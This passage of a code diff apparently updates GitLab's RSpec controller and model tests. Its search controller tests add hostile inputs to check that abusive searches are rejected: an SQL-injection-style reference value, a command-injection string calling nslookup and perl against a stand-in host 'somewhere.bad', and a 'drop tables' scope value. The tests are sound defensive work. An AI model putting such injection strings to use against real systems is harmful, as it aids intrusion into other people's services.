let(:expected_options) { collection_arguments } + let(:expected_options) { collection_arguments.merge(commit: merge_request.commits(limit: 
1).first) } end end diff --git a/spec/controllers/projects/merge_requests_controller_spec.rb b/spec/controllers/projects/merge_requests_controller_spec.rb index 46b332a8938..36b6df59ef5 100644 --- a/spec/controllers/projects/merge_requests_controller_spec.rb +++ b/spec/controllers/projects/merge_requests_controller_spec.rb @@ -42,32 +42,6 @@ RSpec.describe Projects::MergeRequestsController do get :show, params: params.merge(extra_params) end - context 'with the invite_members_in_comment experiment', :experiment do - context 'when user can invite' do - before do - stub_experiments(invite_members_in_comment: :invite_member_link) - project.add_maintainer(user) - end - - it 'assigns the candidate experience and tracks the event' do - expect(experiment(:invite_members_in_comment)).to track(:view, property: project.root_ancestor.id.to_s) - .for(:invite_member_link) - .with_context(namespace: project.root_ancestor) - .on_next_instance - - go - end - end - - context 'when user can not invite' do - it 'does not track the event' do - expect(experiment(:invite_members_in_comment)).not_to track(:view) - - go - end - end - end - context 'with view param' do before do go(view: 'parallel') @@ -367,7 +341,8 @@ RSpec.describe Projects::MergeRequestsController do namespace_id: project.namespace, project_id: project, id: merge_request.iid, - merge_request: mr_params + merge_request: mr_params, + serializer: 'basic' }.merge(additional_params) put :update, params: params @@ -1377,7 +1352,7 @@ RSpec.describe Projects::MergeRequestsController do 'create' => 0, 'delete' => 0, 'update' => 1, - 'job_name' => build.options.dig(:artifacts, :name).to_s + 'job_name' => build.name ) ) ) diff --git a/spec/controllers/projects/pipelines_controller_spec.rb b/spec/controllers/projects/pipelines_controller_spec.rb index 14c613ff9c4..3fe709a0d44 100644 --- a/spec/controllers/projects/pipelines_controller_spec.rb +++ b/spec/controllers/projects/pipelines_controller_spec.rb @@ -745,9 +745,28 @@ 
RSpec.describe Projects::PipelinesController do describe 'GET #charts' do let(:pipeline) { create(:ci_pipeline, project: project) } - it_behaves_like 'tracking unique visits', :charts do - let(:request_params) { { namespace_id: project.namespace, project_id: project, id: pipeline.id } } - let(:target_id) { 'p_analytics_pipelines' } + [ + { + chart_param: '', + event: 'p_analytics_ci_cd_pipelines' + }, + { + chart_param: 'pipelines', + event: 'p_analytics_ci_cd_pipelines' + }, + { + chart_param: 'deployment-frequency', + event: 'p_analytics_ci_cd_deployment_frequency' + }, + { + chart_param: 'lead-time', + event: 'p_analytics_ci_cd_lead_time' + } + ].each do |tab| + it_behaves_like 'tracking unique visits', :charts do + let(:request_params) { { namespace_id: project.namespace, project_id: project, id: pipeline.id, chart: tab[:chart_param] } } + let(:target_id) { ['p_analytics_pipelines', tab[:event]] } + end end end diff --git a/spec/controllers/projects/project_members_controller_spec.rb b/spec/controllers/projects/project_members_controller_spec.rb index c352524ec14..d8ef95cf11a 100644 --- a/spec/controllers/projects/project_members_controller_spec.rb +++ b/spec/controllers/projects/project_members_controller_spec.rb @@ -369,7 +369,6 @@ RSpec.describe Projects::ProjectMembersController do context 'when `expires_at` is set' do it 'returns correct json response' do expect(json_response).to eq({ - "expires_in" => "about 1 month", "expires_soon" => false, "expires_at_formatted" => expiry_date.to_time.in_time_zone.to_s(:medium) }) diff --git a/spec/controllers/projects/repositories_controller_spec.rb b/spec/controllers/projects/repositories_controller_spec.rb index cb2579b800a..b7eef3812a4 100644 --- a/spec/controllers/projects/repositories_controller_spec.rb +++ b/spec/controllers/projects/repositories_controller_spec.rb @@ -86,7 +86,7 @@ RSpec.describe Projects::RepositoriesController do describe 'rate limiting' do it 'rate limits user when thresholds hit' do - 
expect(controller).to receive(:archive_rate_limit_reached?).and_return(true) + allow(Gitlab::ApplicationRateLimiter).to receive(:throttled?).and_return(true) get :archive, params: { namespace_id: project.namespace, project_id: project, id: 'master' }, format: "html" diff --git a/spec/controllers/projects/serverless/functions_controller_spec.rb b/spec/controllers/projects/serverless/functions_controller_spec.rb index 75135839a06..860bbc1c5cc 100644 --- a/spec/controllers/projects/serverless/functions_controller_spec.rb +++ b/spec/controllers/projects/serverless/functions_controller_spec.rb @@ -128,7 +128,7 @@ RSpec.describe Projects::Serverless::FunctionsController do expect(json_response["functions"]).to all( include( - 'url' => "https://#{function_name}-#{serverless_domain_cluster.uuid[0..1]}a1#{serverless_domain_cluster.uuid[2..-3]}f2#{serverless_domain_cluster.uuid[-2..-1]}#{"%x" % environment.id}-#{environment.slug}.#{serverless_domain_cluster.domain}" + 'url' => "https://#{function_name}-#{serverless_domain_cluster.uuid[0..1]}a1#{serverless_domain_cluster.uuid[2..-3]}f2#{serverless_domain_cluster.uuid[-2..]}#{"%x" % environment.id}-#{environment.slug}.#{serverless_domain_cluster.domain}" ) ) end @@ -166,7 +166,7 @@ RSpec.describe Projects::Serverless::FunctionsController do expect(response).to have_gitlab_http_status(:ok) expect(json_response).to include( - 'url' => "https://#{function_name}-#{serverless_domain_cluster.uuid[0..1]}a1#{serverless_domain_cluster.uuid[2..-3]}f2#{serverless_domain_cluster.uuid[-2..-1]}#{"%x" % environment.id}-#{environment.slug}.#{serverless_domain_cluster.domain}" + 'url' => "https://#{function_name}-#{serverless_domain_cluster.uuid[0..1]}a1#{serverless_domain_cluster.uuid[2..-3]}f2#{serverless_domain_cluster.uuid[-2..]}#{"%x" % environment.id}-#{environment.slug}.#{serverless_domain_cluster.domain}" ) end diff --git a/spec/controllers/projects/settings/ci_cd_controller_spec.rb 
b/spec/controllers/projects/settings/ci_cd_controller_spec.rb index dc7066f6b61..d50f1aa1dd8 100644 --- a/spec/controllers/projects/settings/ci_cd_controller_spec.rb +++ b/spec/controllers/projects/settings/ci_cd_controller_spec.rb @@ -25,6 +25,17 @@ RSpec.describe Projects::Settings::CiCdController do expect(response).to render_template(:show) end + context 'with CI/CD disabled' do + before do + project.project_feature.update_attribute(:builds_access_level, ProjectFeature::DISABLED) + end + + it 'renders show with 404 status code' do + get :show, params: { namespace_id: project.namespace, project_id: project } + expect(response).to have_gitlab_http_status(:not_found) + end + end + context 'with group runners' do let_it_be(:group_runner) { create(:ci_runner, :group, groups: [group]) } let_it_be(:project_runner) { create(:ci_runner, :project, projects: [other_project]) } diff --git a/spec/controllers/projects_controller_spec.rb b/spec/controllers/projects_controller_spec.rb index dafa639a2d5..fd0f9985392 100644 --- a/spec/controllers/projects_controller_spec.rb +++ b/spec/controllers/projects_controller_spec.rb @@ -899,10 +899,34 @@ RSpec.describe ProjectsController do describe '#transfer', :enable_admin_mode do render_views - let_it_be(:project, reload: true) { create(:project) } + let(:project) { create(:project) } + let_it_be(:admin) { create(:admin) } let_it_be(:new_namespace) { create(:namespace) } + shared_examples 'project namespace is not changed' do |flash_message| + it 'project namespace is not changed' do + controller.instance_variable_set(:@project, project) + sign_in(admin) + + old_namespace = project.namespace + + put :transfer, + params: { + namespace_id: old_namespace.path, + new_namespace_id: new_namespace_id, + id: project.path + }, + format: :js + + project.reload + + expect(project.namespace).to eq(old_namespace) + expect(response).to redirect_to(edit_project_path(project)) + expect(flash[:alert]).to eq flash_message + end + end + it 'updates 
namespace' do sign_in(admin) @@ -917,30 +941,19 @@ RSpec.describe ProjectsController do project.reload expect(project.namespace).to eq(new_namespace) - expect(response).to have_gitlab_http_status(:ok) + expect(response).to redirect_to(edit_project_path(project)) end context 'when new namespace is empty' do - it 'project namespace is not changed' do - controller.instance_variable_set(:@project, project) - sign_in(admin) + let(:new_namespace_id) { nil } - old_namespace = project.namespace - - put :transfer, - params: { - namespace_id: old_namespace.path, - new_namespace_id: nil, - id: project.path - }, - format: :js + it_behaves_like 'project namespace is not changed', s_('TransferProject|Please select a new namespace for your project.') + end - project.reload + context 'when new namespace is the same as the current namespace' do + let(:new_namespace_id) { project.namespace.id } - expect(project.namespace).to eq(old_namespace) - expect(response).to have_gitlab_http_status(:ok) - expect(flash[:alert]).to eq s_('TransferProject|Please select a new namespace for your project.') - end + it_behaves_like 'project namespace is not changed', s_('TransferProject|Project is already in this namespace.') end end @@ -1092,7 +1105,7 @@ RSpec.describe ProjectsController do expect(forked_project.reload.forked?).to be_falsey expect(flash[:notice]).to eq(s_('The fork relationship has been removed.')) - expect(response).to render_template(:remove_fork) + expect(response).to redirect_to(edit_project_path(forked_project)) end end @@ -1108,7 +1121,7 @@ RSpec.describe ProjectsController do format: :js) expect(flash[:notice]).to be_nil - expect(response).to render_template(:remove_fork) + expect(response).to redirect_to(edit_project_path(unforked_project)) end end end diff --git a/spec/controllers/registrations/welcome_controller_spec.rb b/spec/controllers/registrations/welcome_controller_spec.rb index 0a1e6b8ec8f..c444875bf74 100644 --- 
a/spec/controllers/registrations/welcome_controller_spec.rb +++ b/spec/controllers/registrations/welcome_controller_spec.rb @@ -101,10 +101,6 @@ RSpec.describe Registrations::WelcomeController do context 'when tasks to be done are assigned' do let!(:member1) { create(:group_member, user: user, tasks_to_be_done: %w(ci code)) } - before do - stub_experiments(invite_members_for_task: true) - end - it { is_expected.to redirect_to(issues_dashboard_path(assignee_username: user.username)) } end end diff --git a/spec/controllers/registrations_controller_spec.rb b/spec/controllers/registrations_controller_spec.rb index baf500c2b57..3f7941b3456 100644 --- a/spec/controllers/registrations_controller_spec.rb +++ b/spec/controllers/registrations_controller_spec.rb @@ -159,12 +159,11 @@ RSpec.describe RegistrationsController do let_it_be(:member) { create(:project_member, :invited, invite_email: user_params.dig(:user, :email)) } let(:originating_member_id) { member.id } - let(:extra_session_params) { {} } let(:session_params) do { invite_email: user_params.dig(:user, :email), originating_member_id: originating_member_id - }.merge extra_session_params + } end context 'when member exists from the session key value' do @@ -193,74 +192,6 @@ RSpec.describe RegistrationsController do ) end end - - context 'with the invite_email_preview_text experiment', :experiment do - let(:extra_session_params) { { invite_email_experiment_name: 'invite_email_preview_text' } } - - context 'when member and invite_email_experiment_name exists from the session key value' do - it 'tracks the invite acceptance' do - expect(experiment(:invite_email_preview_text)).to track(:accepted) - .with_context(actor: member) - .on_next_instance - - subject - end - end - - context 'when member does not exist from the session key value' do - let(:originating_member_id) { -1 } - - it 'does not track invite acceptance' do - expect(experiment(:invite_email_preview_text)).not_to track(:accepted) - - subject - end - end - - 
context 'when invite_email_experiment_name does not exist from the session key value' do - let(:extra_session_params) { {} } - - it 'does not track invite acceptance' do - expect(experiment(:invite_email_preview_text)).not_to track(:accepted) - - subject - end - end - end - - context 'with the invite_email_preview_text experiment', :experiment do - let(:extra_session_params) { { invite_email_experiment_name: 'invite_email_from' } } - - context 'when member and invite_email_experiment_name exists from the session key value' do - it 'tracks the invite acceptance' do - expect(experiment(:invite_email_from)).to track(:accepted) - .with_context(actor: member) - .on_next_instance - - subject - end - end - - context 'when member does not exist from the session key value' do - let(:originating_member_id) { -1 } - - it 'does not track invite acceptance' do - expect(experiment(:invite_email_from)).not_to track(:accepted) - - subject - end - end - - context 'when invite_email_experiment_name does not exist from the session key value' do - let(:extra_session_params) { {} } - - it 'does not track invite acceptance' do - expect(experiment(:invite_email_from)).not_to track(:accepted) - - subject - end - end - end end context 'when invite email matches email used on registration' do diff --git a/spec/controllers/repositories/git_http_controller_spec.rb b/spec/controllers/repositories/git_http_controller_spec.rb index b5cd14154a3..4a6e745cd63 100644 --- a/spec/controllers/repositories/git_http_controller_spec.rb +++ b/spec/controllers/repositories/git_http_controller_spec.rb @@ -90,6 +90,14 @@ RSpec.describe Repositories::GitHttpController do end end end + + context 'when the user is a deploy token' do + it_behaves_like Repositories::GitHttpController do + let(:container) { project } + let(:user) { create(:deploy_token, :project, projects: [project]) } + let(:access_checker_class) { Gitlab::GitAccess } + end + end end context 'when repository container is a project wiki' do diff 
--git a/spec/controllers/root_controller_spec.rb b/spec/controllers/root_controller_spec.rb index dbf1b3baf25..c6a8cee2f70 100644 --- a/spec/controllers/root_controller_spec.rb +++ b/spec/controllers/root_controller_spec.rb @@ -131,28 +131,10 @@ RSpec.describe RootController do context 'who uses the default dashboard setting', :aggregate_failures do render_views - context 'with customize homepage banner' do - it 'renders the default dashboard' do - get :index - - expect(response).to render_template 'root/index' - expect(response.body).to have_css('.js-customize-homepage-banner') - end - end - - context 'without customize homepage banner' do - before do - Users::DismissUserCalloutService.new( - container: nil, current_user: user, params: { feature_name: UserCalloutsHelper::CUSTOMIZE_HOMEPAGE } - ).execute - end - - it 'renders the default dashboard' do - get :index + it 'renders the default dashboard' do + get :index - expect(response).to render_template 'root/index' - expect(response.body).not_to have_css('.js-customize-homepage-banner') - end + expect(response).to render_template 'dashboard/projects/index' end end end diff --git a/spec/controllers/search_controller_spec.rb b/spec/controllers/search_controller_spec.rb index 73e8e0c7dd4..a54f16ec237 100644 --- a/spec/controllers/search_controller_spec.rb +++ b/spec/controllers/search_controller_spec.rb @@ -127,21 +127,26 @@ RSpec.describe SearchController do context 'check search term length' do let(:search_queries) do - char_limit = SearchService::SEARCH_CHAR_LIMIT - term_limit = SearchService::SEARCH_TERM_LIMIT + char_limit = Gitlab::Search::Params::SEARCH_CHAR_LIMIT + term_limit = Gitlab::Search::Params::SEARCH_TERM_LIMIT + term_char_limit = Gitlab::Search::AbuseDetection::ABUSIVE_TERM_SIZE { - chars_under_limit: ('a' * (char_limit - 1)), - chars_over_limit: ('a' * (char_limit + 1)), - terms_under_limit: ('abc ' * (term_limit - 1)), - terms_over_limit: ('abc ' * (term_limit + 1)) + chars_under_limit: (('a' * 
(term_char_limit - 1) + ' ') * (term_limit - 1))[0, char_limit], + chars_over_limit: (('a' * (term_char_limit - 1) + ' ') * (term_limit - 1))[0, char_limit + 1], + terms_under_limit: ('abc ' * (term_limit - 1)), + terms_over_limit: ('abc ' * (term_limit + 1)), + term_length_over_limit: ('a' * (term_char_limit + 1)), + term_length_under_limit: ('a' * (term_char_limit - 1)) } end where(:string_name, :expectation) do - :chars_under_limit | :not_to_set_flash - :chars_over_limit | :set_chars_flash - :terms_under_limit | :not_to_set_flash - :terms_over_limit | :set_terms_flash + :chars_under_limit | :not_to_set_flash + :chars_over_limit | :set_chars_flash + :terms_under_limit | :not_to_set_flash + :terms_over_limit | :set_terms_flash + :term_length_under_limit | :not_to_set_flash + :term_length_over_limit | :not_to_set_flash # abuse, so do nothing. end with_them do @@ -172,6 +177,12 @@ RSpec.describe SearchController do expect(response).to redirect_to new_user_session_path end + + it 'redirects to login page when trying to circumvent the restriction' do + get :show, params: { scope: 'projects', project_id: non_existing_record_id, search: '*' } + + expect(response).to redirect_to new_user_session_path + end end context 'for authenticated user' do @@ -181,6 +192,14 @@ RSpec.describe SearchController do expect(response).to have_gitlab_http_status(:ok) end end + + context 'handling abusive search_terms' do + it 'succeeds but does NOT do anything' do + get :show, params: { scope: 'projects', search: '*', repository_ref: '-1%20OR%203%2B640-640-1=0%2B0%2B0%2B1' } + expect(response).to have_gitlab_http_status(:ok) + expect(assigns(:search_results)).to be_a Gitlab::EmptySearchResults + end + end end context 'tab feature flags' do @@ -215,16 +234,6 @@ RSpec.describe SearchController do end end - it 'strips surrounding whitespace from search query' do - get :show, params: { scope: 'notes', search: ' foobar ' } - expect(assigns[:search_term]).to eq 'foobar' - end - - it 'strips 
surrounding whitespace from autocomplete term' do - expect(controller).to receive(:search_autocomplete_opts).with('youcompleteme') - get :autocomplete, params: { term: ' youcompleteme ' } - end - it 'finds issue comments' do project = create(:project, :public) note = create(:note_on_issue, project: project) @@ -283,7 +292,7 @@ RSpec.describe SearchController do end end - describe 'GET #count' do + describe 'GET #count', :aggregate_failures do it_behaves_like 'when the user cannot read cross project', :count, { search: 'hello', scope: 'projects' } it_behaves_like 'with external authorization service enabled', :count, { search: 'hello', scope: 'projects' } it_behaves_like 'support for active record query timeouts', :count, { search: 'hello', scope: 'projects' }, :search_results, :json @@ -315,13 +324,40 @@ RSpec.describe SearchController do expect(response).to have_gitlab_http_status(:ok) - expect(response.headers['Cache-Control']).to eq('private, no-store') + expect(response.headers['Cache-Control']).to eq('max-age=60, private') + end + + it 'does NOT blow up if search param is NOT a string' do + get :count, params: { search: ['hello'], scope: 'projects' } + expect(response).to have_gitlab_http_status(:ok) + expect(json_response).to eq({ 'count' => '0' }) + + get :count, params: { search: { nested: 'hello' }, scope: 'projects' } + expect(response).to have_gitlab_http_status(:ok) + expect(json_response).to eq({ 'count' => '0' }) + end + + it 'does NOT blow up if repository_ref contains abusive characters' do + get :count, params: { + search: 'hello', + repository_ref: "(nslookup%20hitqlwv501f.somewhere.bad%7C%7Cperl%20-e%20%22gethostbyname('hitqlwv501f.somewhere.bad')%22)", + scope: 'projects' + } + expect(response).to have_gitlab_http_status(:ok) + expect(json_response).to eq({ 'count' => '0' }) end end describe 'GET #autocomplete' do it_behaves_like 'when the user cannot read cross project', :autocomplete, { term: 'hello' } it_behaves_like 'with external 
authorization service enabled', :autocomplete, { term: 'hello' } + it_behaves_like 'support for active record query timeouts', :autocomplete, { term: 'hello' }, :project, :json + + it 'returns an empty array when given abusive search term' do + get :autocomplete, params: { term: ('hal' * 9000), scope: 'projects' } + expect(response).to have_gitlab_http_status(:ok) + expect(json_response).to match_array([]) + end end describe '#append_info_to_payload' do @@ -351,6 +387,35 @@ RSpec.describe SearchController do get :show, params: { search: 'hello world', group_id: '123', project_id: '456' } end end + + context 'abusive searches', :aggregate_failures do + let(:project) { create(:project, :public, name: 'hello world') } + let(:make_abusive_request) do + get :show, params: { scope: '1;drop%20tables;boom', search: 'hello world', project_id: project.id } + end + + before do + enable_external_authorization_service_check + end + + it 'returns EmptySearchResults' do + expect(Gitlab::EmptySearchResults).to receive(:new).and_call_original + make_abusive_request + expect(response).to have_gitlab_http_status(:ok) + end + + context 'when the feature flag is disabled' do + before do + stub_feature_flags(prevent_abusive_searches: false) + end + + it 'returns a regular search result' do + expect(Gitlab::EmptySearchResults).not_to receive(:new) + make_abusive_request + expect(response).to have_gitlab_http_status(:ok) + end + end + end end context 'unauthorized user' do diff --git a/spec/controllers/sent_notifications_controller_spec.rb b/spec/controllers/sent_notifications_controller_spec.rb index 02aaa5b16f1..ec74a902258 100644 --- a/spec/controllers/sent_notifications_controller_spec.rb +++ b/spec/controllers/sent_notifications_controller_spec.rb @@ -10,19 +10,19 @@ RSpec.describe SentNotificationsController do let(:issue) do create(:issue, project: target_project) do |issue| - issue.subscriptions.create(user: user, project: target_project, subscribed: true) + 
issue.subscriptions.create!(user: user, project: target_project, subscribed: true) end end let(:confidential_issue) do create(:issue, project: target_project, confidential: true) do |issue| - issue.subscriptions.create(user: user, project: target_project, subscribed: true) + issue.subscriptions.create!(user: user, project: target_project, subscribed: true) end end let(:merge_request) do create(:merge_request, source_project: target_project, target_project: target_project) do |mr| - mr.subscriptions.create(user: user, project: target_project, subscribed: true) + mr.subscriptions.create!(user: user, project: target_project, subscribed: true) end end @@ -213,7 +213,7 @@ RSpec.describe SentNotificationsController do context 'when the force param is not passed' do let(:merge_request) do create(:merge_request, source_project: project, author: user) do |merge_request| - merge_request.subscriptions.create(user: user, project: project, subscribed: true) + merge_request.subscriptions.create!(user: user, project: project, subscribed: true) end end diff --git a/spec/controllers/sessions_controller_spec.rb b/spec/controllers/sessions_controller_spec.rb index c233e5b7c15..31de00dd8bd 100644 --- a/spec/controllers/sessions_controller_spec.rb +++ b/spec/controllers/sessions_controller_spec.rb @@ -403,7 +403,7 @@ RSpec.describe SessionsController do context 'when the user is on their last attempt' do before do - user.update(failed_attempts: User.maximum_attempts.pred) + user.update!(failed_attempts: User.maximum_attempts.pred) end context 'when OTP is valid' do diff --git a/spec/controllers/user_callouts_controller_spec.rb b/spec/controllers/users/callouts_controller_spec.rb index 3bb8d78a6b0..13dc565b4ad 100644 --- a/spec/controllers/user_callouts_controller_spec.rb +++ b/spec/controllers/users/callouts_controller_spec.rb @@ -2,7 +2,7 @@ require 'spec_helper' -RSpec.describe UserCalloutsController do +RSpec.describe Users::CalloutsController do let_it_be(:user) { create(:user) } 
before do @@ -15,11 +15,11 @@ RSpec.describe UserCalloutsController do subject { post :create, params: params, format: :json } context 'with valid feature name' do - let(:feature_name) { UserCallout.feature_names.each_key.first } + let(:feature_name) { Users::Callout.feature_names.each_key.first } context 'when callout entry does not exist' do it 'creates a callout entry with dismissed state' do - expect { subject }.to change { UserCallout.count }.by(1) + expect { subject }.to change { Users::Callout.count }.by(1) end it 'returns success' do @@ -30,10 +30,10 @@ RSpec.describe UserCalloutsController do end context 'when callout entry already exists' do - let!(:callout) { create(:user_callout, feature_name: UserCallout.feature_names.each_key.first, user: user) } + let!(:callout) { create(:callout, feature_name: Users::Callout.feature_names.each_key.first, user: user) } it 'returns success', :aggregate_failures do - expect { subject }.not_to change { UserCallout.count } + expect { subject }.not_to change { Users::Callout.count } expect(response).to have_gitlab_http_status(:ok) end end diff --git a/spec/db/schema_spec.rb b/spec/db/schema_spec.rb index 521b4cd4002..edb412cbb9c 100644 --- a/spec/db/schema_spec.rb +++ b/spec/db/schema_spec.rb @@ -26,10 +26,8 @@ RSpec.describe 'Database schema' do boards: %w[milestone_id iteration_id], chat_names: %w[chat_id team_id user_id], chat_teams: %w[team_id], - ci_builds: %w[erased_by_id runner_id trigger_request_id user_id], + ci_builds: %w[erased_by_id runner_id trigger_request_id], ci_namespace_monthly_usages: %w[namespace_id], - ci_pipelines: %w[user_id], - ci_pipeline_chat_data: %w[chat_name_id], # it uses the loose foreign key featue ci_runner_projects: %w[runner_id], ci_trigger_requests: %w[commit_id], cluster_providers_aws: %w[security_group_id vpc_id access_key_id], @@ -53,6 +51,7 @@ RSpec.describe 'Database schema' do identities: %w[user_id], import_failures: %w[project_id], issues: %w[last_edited_by_id state_id], + 
issue_emails: %w[email_message_id], jira_tracker_data: %w[jira_issue_transition_id], keys: %w[user_id], label_links: %w[target_id], @@ -66,8 +65,6 @@ RSpec.describe 'Database schema' do oauth_access_grants: %w[resource_owner_id application_id], oauth_access_tokens: %w[resource_owner_id application_id], oauth_applications: %w[owner_id], - packages_build_infos: %w[pipeline_id], - packages_package_file_build_infos: %w[pipeline_id], product_analytics_events_experimental: %w[event_id txn_id user_id], project_group_links: %w[group_id], project_statistics: %w[namespace_id], @@ -83,7 +80,6 @@ RSpec.describe 'Database schema' do subscriptions: %w[user_id subscribable_id], suggestions: %w[commit_id], taggings: %w[tag_id taggable_id tagger_id], - terraform_state_versions: %w[ci_build_id], timelogs: %w[user_id], todos: %w[target_id commit_id], uploads: %w[model_id], @@ -101,6 +97,8 @@ RSpec.describe 'Database schema' do let(:indexes) { connection.indexes(table) } let(:columns) { connection.columns(table) } let(:foreign_keys) { connection.foreign_keys(table) } + let(:loose_foreign_keys) { Gitlab::Database::LooseForeignKeys.definitions.group_by(&:from_table).fetch(table, []) } + let(:all_foreign_keys) { foreign_keys + loose_foreign_keys } # take the first column in case we're using a composite primary key let(:primary_key_column) { Array(connection.primary_key(table)).first } @@ -113,7 +111,7 @@ RSpec.describe 'Database schema' do columns = columns.split(',') if columns.is_a?(String) columns.first.chomp end - foreign_keys_columns = foreign_keys.map(&:column) + foreign_keys_columns = all_foreign_keys.map(&:column) # Add the primary key column to the list of indexed columns because # postgres and mysql both automatically create an index on the primary @@ -128,7 +126,7 @@ RSpec.describe 'Database schema' do context 'columns ending with _id' do let(:column_names) { columns.map(&:name) } let(:column_names_with_id) { column_names.select { |column_name| column_name.ends_with?('_id') } 
} - let(:foreign_keys_columns) { foreign_keys.map(&:column) } + let(:foreign_keys_columns) { all_foreign_keys.map(&:column).uniq } # we can have FK and loose FK present at the same time let(:ignored_columns) { ignored_fk_columns(table) } it 'do have the foreign keys' do @@ -170,7 +168,7 @@ RSpec.describe 'Database schema' do 'PrometheusMetric' => %w[group], 'ResourceLabelEvent' => %w[action], 'User' => %w[layout dashboard project_view], - 'UserCallout' => %w[feature_name], + 'Users::Callout' => %w[feature_name], 'PrometheusAlert' => %w[operator] }.freeze diff --git a/spec/dependencies/omniauth_saml_spec.rb b/spec/dependencies/omniauth_saml_spec.rb index fa179eb1516..8956fa44b7a 100644 --- a/spec/dependencies/omniauth_saml_spec.rb +++ b/spec/dependencies/omniauth_saml_spec.rb @@ -7,7 +7,7 @@ RSpec.describe 'processing of SAMLResponse in dependencies' do let(:mock_saml_response) { File.read('spec/fixtures/authentication/saml_response.xml') } let(:saml_strategy) { OmniAuth::Strategies::SAML.new({}) } let(:session_mock) { {} } - let(:settings) { OpenStruct.new({ soft: false, idp_cert_fingerprint: 'something' }) } + let(:settings) { double('settings', { soft: false, idp_cert_fingerprint: 'something' }) } let(:auth_hash) { Gitlab::Auth::Saml::AuthHash.new(saml_strategy) } subject { auth_hash.authn_context } diff --git a/spec/experiments/application_experiment_spec.rb b/spec/experiments/application_experiment_spec.rb index b0788eec808..5146fe3e752 100644 --- a/spec/experiments/application_experiment_spec.rb +++ b/spec/experiments/application_experiment_spec.rb @@ -3,7 +3,7 @@ require 'spec_helper' RSpec.describe ApplicationExperiment, :experiment do - subject { described_class.new('namespaced/stub', **context) } + subject(:application_experiment) { described_class.new('namespaced/stub', **context) } let(:context) { {} } let(:feature_definition) { { name: 'namespaced_stub', type: 'experiment', default_enabled: false } } @@ -15,7 +15,7 @@ RSpec.describe 
ApplicationExperiment, :experiment do end before do - allow(subject).to receive(:enabled?).and_return(true) + allow(application_experiment).to receive(:enabled?).and_return(true) end it "doesn't raise an exception without a defined control" do @@ -26,7 +26,7 @@ RSpec.describe ApplicationExperiment, :experiment do describe "#enabled?" do before do - allow(subject).to receive(:enabled?).and_call_original + allow(application_experiment).to receive(:enabled?).and_call_original allow(Feature::Definition).to receive(:get).and_return('_instance_') allow(Gitlab).to receive(:dev_env_or_com?).and_return(true) @@ -34,25 +34,25 @@ RSpec.describe ApplicationExperiment, :experiment do end it "is enabled when all criteria are met" do - expect(subject).to be_enabled + expect(application_experiment).to be_enabled end it "isn't enabled if the feature definition doesn't exist" do expect(Feature::Definition).to receive(:get).with('namespaced_stub').and_return(nil) - expect(subject).not_to be_enabled + expect(application_experiment).not_to be_enabled end it "isn't enabled if we're not in dev or dotcom environments" do expect(Gitlab).to receive(:dev_env_or_com?).and_return(false) - expect(subject).not_to be_enabled + expect(application_experiment).not_to be_enabled end it "isn't enabled if the feature flag state is :off" do expect(Feature).to receive(:get).with('namespaced_stub').and_return(double(state: :off)) - expect(subject).not_to be_enabled + expect(application_experiment).not_to be_enabled end end @@ -60,11 +60,11 @@ RSpec.describe ApplicationExperiment, :experiment do let(:should_track) { true } before do - allow(subject).to receive(:should_track?).and_return(should_track) + allow(application_experiment).to receive(:should_track?).and_return(should_track) end it "tracks the assignment", :snowplow do - subject.publish + application_experiment.publish expect_snowplow_event( category: 'namespaced/stub', @@ -74,24 +74,16 @@ RSpec.describe ApplicationExperiment, :experiment do end it 
"publishes to the client" do - expect(subject).to receive(:publish_to_client) + expect(application_experiment).to receive(:publish_to_client) - subject.publish - end - - it "publishes to the database if we've opted for that" do - subject.record! - - expect(subject).to receive(:publish_to_database) - - subject.publish + application_experiment.publish end context 'when we should not track' do let(:should_track) { false } it 'does not track an event to Snowplow', :snowplow do - subject.publish + application_experiment.publish expect_no_snowplow_event end @@ -102,13 +94,13 @@ RSpec.describe ApplicationExperiment, :experiment do signature = { key: '86208ac54ca798e11f127e8b23ec396a', variant: 'control' } expect(Gon).to receive(:push).with({ experiment: { 'namespaced/stub' => hash_including(signature) } }, true) - subject.publish_to_client + application_experiment.publish_to_client end it "handles when Gon raises exceptions (like when it can't be pushed into)" do expect(Gon).to receive(:push).and_raise(NoMethodError) - expect { subject.publish_to_client }.not_to raise_error + expect { application_experiment.publish_to_client }.not_to raise_error end context 'when we should not track' do @@ -117,7 +109,7 @@ RSpec.describe ApplicationExperiment, :experiment do it 'returns early' do expect(Gon).not_to receive(:push) - subject.publish_to_client + application_experiment.publish_to_client end end end @@ -125,13 +117,15 @@ RSpec.describe ApplicationExperiment, :experiment do describe '#publish_to_database' do using RSpec::Parameterized::TableSyntax + let(:publish_to_database) { application_experiment.publish_to_database } + shared_examples 'does not record to the database' do it 'does not create an experiment record' do - expect { subject.publish_to_database }.not_to change(Experiment, :count) + expect { publish_to_database }.not_to change(Experiment, :count) end it 'does not create an experiment subject record' do - expect { subject.publish_to_database }.not_to 
change(ExperimentSubject, :count) + expect { publish_to_database }.not_to change(ExperimentSubject, :count) end end @@ -139,16 +133,16 @@ RSpec.describe ApplicationExperiment, :experiment do let(:context) { { context_key => context_value } } where(:context_key, :context_value, :object_type) do - :namespace | build(:namespace) | :namespace - :group | build(:namespace) | :namespace - :project | build(:project) | :project - :user | build(:user) | :user - :actor | build(:user) | :user + :namespace | build(:namespace, id: non_existing_record_id) | :namespace + :group | build(:namespace, id: non_existing_record_id) | :namespace + :project | build(:project, id: non_existing_record_id) | :project + :user | build(:user, id: non_existing_record_id) | :user + :actor | build(:user, id: non_existing_record_id) | :user end with_them do it 'creates an experiment and experiment subject record' do - expect { subject.publish_to_database }.to change(Experiment, :count).by(1) + expect { publish_to_database }.to change(Experiment, :count).by(1) expect(Experiment.last.name).to eq('namespaced/stub') expect(ExperimentSubject.last.send(object_type)).to eq(context[context_key]) @@ -156,6 +150,16 @@ RSpec.describe ApplicationExperiment, :experiment do end end + context "when experiment hasn't ran" do + let(:context) { { user: create(:user) } } + + it 'sets a variant on the experiment subject' do + publish_to_database + + expect(ExperimentSubject.last.variant).to eq('control') + end + end + context 'when there is not a usable subject' do let(:context) { { context_key => context_value } } @@ -183,15 +187,15 @@ RSpec.describe ApplicationExperiment, :experiment do end it "doesn't track if we shouldn't track" do - allow(subject).to receive(:should_track?).and_return(false) + allow(application_experiment).to receive(:should_track?).and_return(false) - subject.track(:action) + application_experiment.track(:action) expect_no_snowplow_event end it "tracks the event with the expected arguments and 
